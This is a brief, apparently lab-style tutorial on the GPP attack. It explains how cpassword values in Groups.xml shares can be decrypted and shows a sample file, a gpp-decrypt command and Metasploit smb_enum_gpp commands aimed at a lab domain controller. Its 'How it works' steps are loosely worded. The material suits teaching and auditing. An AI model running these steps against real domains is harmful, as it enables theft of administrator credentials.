GPP Attack
TL;DR
Group Policy Preferences (GPP) allowed administrators to store encrypted credentials in XML files. Microsoft accidentally released the encryption key, making previously stored credentials vulnerable. While patched in MS14-025, older servers may still contain exploitable GPP credentials (2012 servers for example). we could use Metasploit smb_enum_gpp module:
msfconsole use auxiliary/scanner/smb/smb_enum_gpp set RHOSTS 192.168.1.100 set SMBDomain lab.local set SMBUser user set SMBPass password exploit
What are Group Policy Preferences (GPP)?
Group Policy Preferences (GPP) allowed administrators to store encrypted credentials in XML files. Microsoft accidentally released the encryption key, making previously stored credentials vulnerable. While patched in MS14-025, older servers may still contain exploitable GPP credentials (2012 servers for example).
How it works?
- Administrator creates a GPP XML file with credentials
- Administrator encrypts the file with the GPP password
- Administrator stores the encrypted file in a shared location
- Attacker finds the file and decrypts it using the GPP password
- Attacker gains access to the credentials
Demo Time
First we should find the Groups.xml file.
example of a Groups.xml file with a cpassword value:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA19A}" name="lab\Administrator" image="2" changed="2023-03-29 10:43:50" uid="{E0917100-75D3-4A9A-A786-62134D6261F0}">
<Properties action="U" newName="" fullName="" description="" cpassword="encrypted-password-found-here" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="lab\Administrator"/>
</User>
</Groups>
then we can use the following command to decrypt it:
gpp-decrypt <the-cpassword-value-found-in-the-file>
or we could use Metasploit smb_enum_gpp module:
msfconsole
use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS 192.168.1.100
set SMBDomain lab.local
set SMBUser user
set SMBPass password
exploit